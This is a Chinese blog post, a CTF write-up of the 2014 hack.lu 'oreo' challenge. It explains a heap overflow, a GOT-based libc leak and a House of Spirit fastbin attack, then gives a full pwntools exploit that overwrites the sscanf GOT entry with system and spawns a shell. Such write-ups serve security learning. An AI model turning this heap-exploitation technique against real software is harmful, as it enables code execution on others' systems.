House Of Spirit 2014 hack.lu oreo

最新推荐文章于 2024-06-13 08:44:35 发布
最新推荐文章于 2024-06-13 08:44:35 发布
阅读量184 收藏
点赞数
文章标签: 安全 网络 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69107736/article/details/129676202
版权

House Of Spirit 2014 hack.lu oreo

grxer@Ubuntu16:~/Desktop/pwn/heap$ checksec oreo
[*] '/home/grxer/Desktop/pwn/heap/oreo'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/fastbin-attack/2014_hack.lu_oreo

泄露地址

add函数里存在溢出漏洞

00000000 rifle           struc ; (sizeof=0x38, mappedto_5)
00000000 descript        db 25 dup(?)
00000019 name            db 27 dup(?)
00000034 next            dd ?                    ; offset
00000038 rifle           ends

往name和的script里面都是读了56个字节,都可以溢出

覆盖next为putsgot在show函数里可以在第二次打印时泄露

.text:08048774                 mov     eax, [ebp+var_14]
.text:08048777                 mov     [esp+4], eax
.text:0804877B                 mov     dword ptr [esp], offset aDescriptionS ; "Description: %s\n"
.text:08048782                 call    _printf

这里直接把eax里内容next地址放到eax,可以%s解析got打印出来

puts_got=elf.got[‘puts’]
payload1 = b’a’*27+p32(puts_got)
add(b’a’*25,payload1)
show_rifle()

House Of Spirit

这里需要绕过一些检测

  • fake chunk 的 ISMMAP 位不能为 1,因为 free 时,如果是 mmap 的 chunk,会单独处理。
  • fake chunk 地址需要对齐, MALLOC_ALIGN_MASK
  • fake chunk 的 size 大小需要满足对应的 fastbin 的需求,同时也得对齐。
  • fake chunk 的 next chunk 的大小不能小于 2 * SIZE_SZ,同时也不能大于av->system_mem
  • fake chunk 对应的 fastbin 链表头部不能是该 fake chunk,即不能构成 double free 的情况。

这里我们可以控制next,可以free(next),可以修改notice,而且notice指针上面就可以控制size大小,天生的伪造,再申请控制0804A2A8

bss:0804A2A4 rifle_cnt       dd ?                    ; DATA XREF: add+C5↑r
.bss:0804A2A4                                         ; add+CD↑w ...
.bss:0804A2A8 ; char *notice
.bss:0804A2A8 notice          dd ?                    ; DATA XREF: message+23↑r
.bss:0804A2A8                                         ; message+3C↑r ...

我们申请只能在add函数里面malloc(0x38),也就是说size必须控制为0x38+0x8来申请,这样我们申请0x40个chunk,再控制最后一个next指针指向0804A2A8,这个伪造chunk next域必须为空,防止free chunk->next,这里是往0804A2A8里面的地址0804A2c0去写数据
在这里插入图片描述

,padding0x20,即可满足到底下一个fake chunk,将其prev size和size改为满足条件即可

再集体free掉,fastbin先进先出,再次申请一个就可以拿到0804A2A0处的chunk,改写__isoc99_sscanfgot即可

在这里插入图片描述

EXP

from pwn import *
from LibcSearcher import *
context(os='linux',arch='i386')
pwnfile='./oreo'
elf = ELF(pwnfile)
rop = ROP(pwnfile)
if args['REMOTE']:
    io = remote()
else:
    io = process(pwnfile)
r = lambda x: io.recv(x)
ra = lambda: io.recvall()
rl = lambda: io.recvline(keepends=True)
ru = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
ia = lambda: io.interactive()
c = lambda: io.close()
li = lambda x: log.info(x)
db = lambda x : gdb.attach(io,x)
p =lambda x,y:success(x+'-->'+hex(y))
def add(descrip, name):
    io.sendline('1')
    io.sendline(name)
    io.sendline(descrip)

def show_rifle():
    io.sendline('2')
    io.recvuntil('===================================\n')

def order():
    io.sendline('3')

def message(notice):
    io.sendline('4')
    io.sendline(notice)
# db('b *0x08048748')
puts_got=elf.got['puts']
payload1 = b'a'*27+p32(puts_got)
add(b'a'*25,payload1)
show_rifle()
ru(b'Description: ')
ru(b'Description: ')
puts_ad=u32(r(4))
p('puts_ad',puts_ad)
libc=LibcSearcher('puts',puts_ad)
base=puts_ad-libc.dump('puts')
system_addr=base+libc.dump('system')
for i in range(0x3e):
    add('a'*25,'a'*27)
payload2 = b'a'*27+p32(0x0804a2a8)
add(b'a'*25,payload2)
payload3 = b'\x00'*0x20+p32(0x41)+p32(0x50)
message(payload3)
order()
gdb.attach(io)

sscanf_got = elf.got['__isoc99_sscanf']
add(p32(sscanf_got),b'a')
# sleep(1)
message(p32(system_addr))
sl(b'/bin/sh\x00')
io.interactive()
Grxer
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Android Oreo8.0.rar
07-11
Android 8.0的NotoColorEmoji.ttf文件,push进自己android的/system/fonts目录替换,可以使手机显示Android 8.0风格的emoji。 注意:解压后需要修改修改文件名为NotoColorEmoji.ttf,并且记得备份原文件,以备...
Oreo支付系统.rar
02-25
支付系统,内置多个首页模板。安装简单。仅供学习
2014 hack.lu oreo house of sprit
m0_57754423的博客
02-14 214
什么是house of spirit? 简单说一下我自己的理解,详细的可以看wiki。 其核心在于在一个任意可写或间接可写的位置伪造一个fake_chunk,然后通过释放该fake_chunk,即可将该fake_chunk连入fastbin中,通过malloc达到分配指定地址chunk的目的。 看道例题:2014 hack.lu oreo 漏洞点:存在堆溢出,chunk未完全free 利用思路: 1.泄露libc: add一个chunk,并且将该chunk的第13个地址位改为任意函数的g
2014 hack.lu oreo
coco的博客
11-25 385
程序分析 这是一个经典的菜单程序 checksec add函数 建立了一个rifle结构体。 struct rifle { description //从0字节开始 name //从25字节开始 pre_rifle_ptr //从52字节开始 } //总共56字节 并且注意到description和name都能读入56个字节,也就是说pre_rifle_ptr是能被完全控制的。 并且有一...
2014 hack.lu——oreo
04-19 229
32位程序,没开PIE   #House Of Spirit 需要注意的是,该程序并没有进行 setvbuf 操作,因此在初次执行 io 函数时,会在堆上分配空间。 程序逻辑 1 unsigned int sub_804898D() 2 { 3 unsigned int v1; // [esp+1Ch] [ebp-Ch] 4 5 v1 =...
【堆知识】chunk结构和堆相关的pwn学习(2014 hack.lu oreo)
ethan18的博客
08-14 189
堆的结构来说还是有着一定的学习难度的,所以写此作为记录。
2022全新Oreo支付系统平台开源版源码
05-18
OREO支付系统是一个安全、可靠、专业、强大的免签约支付接口系统源码,采用了群集服务器,不仅防御高,故障率也相对来说低很多,资金平均停留的时间不超过12小时,所以您的资金安全 集合了微信官方+支付宝官方+易...
Oreo易支付开源版.zip
03-02
1、支持批量生成商户 2、支持各种程序对接 3、支付查看订单信息 4、可以自定义网站信息 5、自带开发文档和对接官方和第三方支付的SDK 6、即时到账功能,别家的是没有的哦。...7、支持QQ、支付宝快捷登录功能。...
基于PHP的Oreo易支付开源版.zip
07-22
基于PHP的Oreo易支付开源版.zip
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 927
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
《软件定义安全》之八:软件定义安全案例
最新发布
大龄IT民工
06-13 1086
Embrane是一家虚拟设备提供商,由Cisco公司前员工创立,该公司致力于实现网络功能实体的软件化,旨在研发出多服务、分布式软件架构的网络服务产品。它于2015年4月被Cisco公司收购。Embrane的软件定义架构称为Heleos,利用虚拟通信设备代替原有基于专有硬件平台的设备,通过一个集中的控制台对虚拟设备进行管理和控制。Heleos与原来的应用交付网络(ADN)产品较为接近,是基于软件的L4~L7虚拟设备,包括负载均衡产品、防火墙、VPN产品和SSLOffload Engine。
NTFS安全权限
2302_80097039的博客
06-12 525
NTFS权限是基于。
《软件定义安全》之三:用软件定义的理念做安全
大龄IT民工
06-08 834
中心化的智能控制系统网络控制器就能根据上下文场景,计算网络安全策略,快速、有效地调度网络中的流量。全局和实时流量视图SDN控制器具有全局网络实时的流量信息,这些信息在很多防护场景中非常有用。例如,在DDoS检测时,可获取物理网络处的硬件交换机的sFlow或OpenFlow流信息,然后根据数据包流的统计特征进行判断,确认是否存在恶意攻击。基于全局网络设备提供的流量信息,可构建基于流量的实时和历史知识库,进而运行时对任意访问进行分析,确认其在历史知识库中是否存在相似的模式。
上心师傅的思路分享(三)--Nacos渗透
weixin_72543266的博客
06-10 960
Nacos 是阿里巴巴推出来的一个开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。但是Nacos是部署在内网的,因此下面通过语法搜索出来的可以看到的,一般会做访问限制的,正常是访问不到的,如果可以访问就可以尝试是否存在漏洞了.当然如果直接在真实环境下测试,一是未授权行为,二是不容易找到复现环境,所以在本地搭建环境来进行复现是最安全,也是最容易。
渗透测试之内核安全系列课程:Rootkit技术初探(三)
fearhacker的专栏
06-08 958
相应的,每个进程,都会存在一个页目录表),1024MB = 1 GB;GDT 全局描述符表、LDT 局部描述符表、GDTR 全局描述符表 寄存器、LDTR 局部描述符表 寄存器 、一致性代码、非一致性代码、实模式、保护模式、线性地址。在 Intel 系列的 芯片中,存在专门的电路,负责将虚拟地址(线性地址)转译为内存物理地址!目前这块,笔者本人,也需要更加深入的理解,也许以后,会涉及到对这方面的更详细讲解 )。想要免杀,需要了解的安全技术知识包括软件加壳、代码混淆(例如,使用花指令)、隐匿技术(例如,
渗透测试之内核安全系列课程:Rootkit技术初探(四)
fearhacker的专栏
06-10 1017
当 PDE( 页目录项 ) 的 PS 位( 第8位 ) 为 1 时,代表PDE( 页目录项 )直接指向页( P ),这时,页的大小为 4MB(这是一个大页),此时,这个大页( 4MB 大小的物理页)的物理地址计算公式为: PDE( 页目录项 ) 的 高 10 位 + 线性地址 的 低 22 位。上述的页目录( PDT )的子项(PDE)除了前7位之外,其它各比特位用途不固定(各关键比特位的位置,同样不固定),因操作系统类型、CPU 版本不同而存在差异!
CentOS7下快速升级至OpenSSH9.7p2安全版本
junzhen_chen的博客
06-12 387
即可验证当前OpenSSH的版本 可以看到openssh的版本为OpenSSH_9.7p1 使用的是OpenSSL 3.0.13 30。vim pullsrc.sh 修改第23行为source ./version.env。在需要升级OpenSSH版本的CentOS7服务器上升级OpenSSH 具体升级操作命令如下。1、编译打包的shell脚本来源于该项目。2、sh pullsrc.sh下载源码包。最后会生成rpm包位于。3、准备编译所需环境。将生成的rpm包打包。
内网安全--隧道技术&代理技术
金灰的博客
06-06 1504
注:本文仅做技术分享,请勿非法破坏...隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网) 硬刚网络协议的封杀!代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作) 本地代理外网流量.
genymotion-arm-translation-oreo-8.0.zip下载
12-10
genymotion-arm-translation-oreo-8.0.zip是一个用于Genymotion模拟器的ARM翻译文件,适用于安卓8.0版本(代号为Oreo)的系统。这个翻译文件的作用是在Genymotion模拟器中支持安卓8.0系统的ARM架构。 想要下载...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值